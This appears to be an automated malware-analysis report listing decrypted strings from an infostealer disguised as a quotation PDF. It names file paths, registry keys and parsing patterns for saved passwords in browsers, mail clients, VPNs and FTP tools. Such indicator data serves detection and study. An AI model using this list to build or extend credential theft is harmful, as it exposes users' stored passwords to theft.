                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: </string>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <string>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: </string>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <data>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: </data>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: -convert xml1 -s -o "
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \fixed_keychain.xml"
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Microsoft\Credentials\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Microsoft\Credentials\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Microsoft\Credentials\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Microsoft\Credentials\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Microsoft\Protect\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: credential
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: QQ Browser
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Tencent\QQBrowser\User Data
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Default\EncryptedStorage
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Profile
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \EncryptedStorage
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: entries
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: category
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: str3
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: str2
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: blob0
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: password_value
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: IncrediMail
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: PopPassword
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SmtpPassword
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\IncrediMail\Identities\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Accounts_New
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: PopPassword
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SmtpPassword
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SmtpServer
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: EmailAddress
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Eudora
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: current
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Settings
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SavePasswordText
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Settings
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ReturnAddress
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Falkon Browser
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \falkon\profiles\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: profiles.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: profiles.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \browsedata.db
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: autofill
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ClawsMail
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Claws-mail
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \clawsrc
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \clawsrc
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: passkey0
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: master_passphrase_salt=(.+)
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \accountrc
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: smtp_server
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: address
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: account
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \passwordstorerc
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {(.*),(.*)}(.*)
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Flock Browser
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: APPDATA
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Flock\Browser\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: signons3.txt
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: DynDns
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ALLUSERSPROFILE
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Dyn\Updater\config.dyndns
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: username=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: password=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: https://account.dyn.com/
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: t6KzXhCh
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ALLUSERSPROFILE
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Dyn\Updater\daemon.cfg
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: global
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: accounts
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: account.
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: username
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: account.
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Psi/Psi+
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: name
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Psi/Psi+
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: APPDATA
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Psi\profiles
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: APPDATA
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Psi+\profiles
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \accounts.xml
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \accounts.xml
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: OpenVPN
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\OpenVPN-GUI\configs\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: username
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: auth-data
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: entropy
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: USERPROFILE
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \OpenVPN\config\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: remote
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: remote
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: NordVPN
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: NordVPN
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: NordVpn.exe*
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: user.config
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: //setting[@name='Username']/value
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: //setting[@name='Password']/value
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: NordVPN
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Private Internet Access
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: %ProgramW6432%
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Private Internet Access\data
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ProgramFiles(x86)
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Private Internet Access\data
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \account.json
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: .*"username":"(.*?)"
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: .*"password":"(.*?)"
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Private Internet Access
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: privateinternetaccess.com
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: FileZilla
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: APPDATA
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \FileZilla\recentservers.xml
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: APPDATA
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \FileZilla\recentservers.xml
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <Server>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <Host>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <Host>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: </Host>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <Port>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: </Port>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <User>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <User>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: </User>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <Pass encoding="base64">
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <Pass encoding="base64">
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: </Pass>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <Pass>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <Pass encoding="base64">
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: </Pass>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: CoreFTP
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: User
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Host
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Port
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: hdfzpysvpzimorhk
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: WinSCP
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: HostName
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: UserName
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: PublicKeyFile
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: PortNumber
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: WinSCP
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ABCDEF
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Flash FXP
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: port
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: user
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: pass
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: quick.dat
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Sites.dat
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \FlashFXP\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \FlashFXP\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: FTP Navigator
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SystemDrive
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \FTP Navigator\Ftplist.txt
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Server
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: No Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: User
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SmartFTP
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: APPDATA
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: WS_FTP
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: appdata
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: HOST
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: PWD=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: PWD=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: FtpCommander
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SystemDrive
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SystemDrive
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SystemDrive
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \cftp\Ftplist.txt
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ;Password=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ;User=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ;Server=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ;Port=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ;Port=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ;Password=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ;User=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ;Anonymous=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: FTPGetter
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \FTPGetter\servers.xml
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <server>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <server_ip>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <server_ip>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: </server_ip>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <server_port>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: </server_port>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <server_user_name>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <server_user_name>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: </server_user_name>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <server_user_password>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <server_user_password>
